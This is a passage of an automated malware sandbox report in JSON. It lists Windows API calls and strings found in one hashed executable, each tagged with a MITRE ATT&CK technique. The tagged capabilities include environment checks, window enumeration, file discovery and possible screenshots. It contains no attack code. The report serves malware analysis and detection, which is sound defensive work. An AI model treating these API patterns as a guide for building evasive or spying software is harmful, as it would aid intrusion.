"identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetWindowTextLengthA\" (Indicator: \"GetWindowText\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetWindowTextLengthA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetActiveWindow\" (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersionExA@KERNEL32.DLL directly followed by \"cmp dword ptr [00412430h], 02h\" and \"jne 004047A3h\" at 00000000-00005280-35015-40-00404764", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, "relevance": 1, "name": "Contains ability to query the machine version", "description": "GetVersionExA@KERNEL32.DLL at 00000000-00005280-35015-40-00404764", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"ExpandEnvironmentStringsA\" (Indicator: \"ExpandEnvironmentStrings\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ZwQuerySystemInformation\" (Indicator: \"QuerySystemInformation\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ExpandEnvironmentStringsA\" (Indicator: \"ExpandEnvironmentStrings\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"ZwQuerySystemInformation\" (Indicator: \"QuerySystemInformation\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-140", "type": 2, "relevance": 1, "name": "Contains ability to verify if file exist on disk (API string)", "description": "Found reference to API \"PathFileExistsA\" (Indicator: \"PathFileExist\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"PathFileExistsA\" (Indicator: \"PathFileExist\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"IsWow64Process\" with parameter \"5280\" - (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" with parameter \"Install &to\" - (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" with parameter \"Bro&wse...\" - (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" with parameter \"Install\" - (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" with parameter \"Cancel\" - (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextA\" with parameter \"C:\\\" - (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" with parameter \"Close\" - (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" with parameter \"4f004b00\" - (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetWindowTextW\" with parameter \"Errors encountered while performing the operationLook at the information window for more details\" - (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "GetProcessHeap@KERNEL32.DLL at 00000000-00005280-35015-13-0040C414", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SHGetSpecialFolderLocation\" (Indicator: \"SHGetSpecialFolderLocation\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"SHGetSpecialFolderLocation\" (Indicator: \"SHGetSpecialFolderLocation\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-84", "type": 2, "relevance": 1, "name": "Contains ability to find logical drives of the machine (API string)", "description": "Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetLogicalDrives\" (Indicator: \"GetLogicalDrives\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetLogicalDrives\" (Indicator: \"GetLogicalDrives\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"P~AeS\" (Indicator: \"aes\"; Source: \"00000000-00005280.00000000.138163.00412000.00000040.mdmp, 00000000-00005280.00000001.138657.00412000.00000040.mdmp\")\n Found string \"PQAeS~\" (Indicator: \"aes\"; Source: \"00000000-00005280.00000000.138163.00412000.00000040.mdmp, 00000000-00005280.00000001.138657.00412000.00000040.mdmp\")\n Found string \"8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS\" (Indicator: \"aes\"; Source: \"00000000-00005280.00000000.138163.00412000.00000040.mdmp, 00000000-00005280.00000001.138657.00412000.00000040.mdmp\")\n Found string \"$4,8-9'66.:$?#1*HhXpAeS~ZrNlS\" (Indicator: \"aes\"; Source: \"00000000-00005280.00000000.138163.00412000.00000040.mdmp, 00000000-00005280.00000001.138657.00412000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1023478027\"\n \"cx\": \"428\"\n \"cy\": \"25\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"805374960\"\n \"cx\": \"428\"\n \"cy\": \"25\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"396\"\n \"cy\": \"20\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"396\"\n \"cy\": \"23\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"378\"\n \"cy\": \"13\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"396\"\n \"cy\": \"15\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"75\"\n \"cy\": \"23\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"377\"\n \"cy\": \"25\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"100730931\"\n \"cx\": \"377\"\n \"cy\": \"25\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"805374960\"\n \"cx\": \"377\"\n \"cy\": \"25\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"88\"\n \"cy\": \"26\"}\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755042745\"\n \"cx\": \"428\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"FindFirstFileW\" with parameter C:\\234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindFirstFileW\" (Indicator: \"FindFirstFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"FindFirstFileW\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", 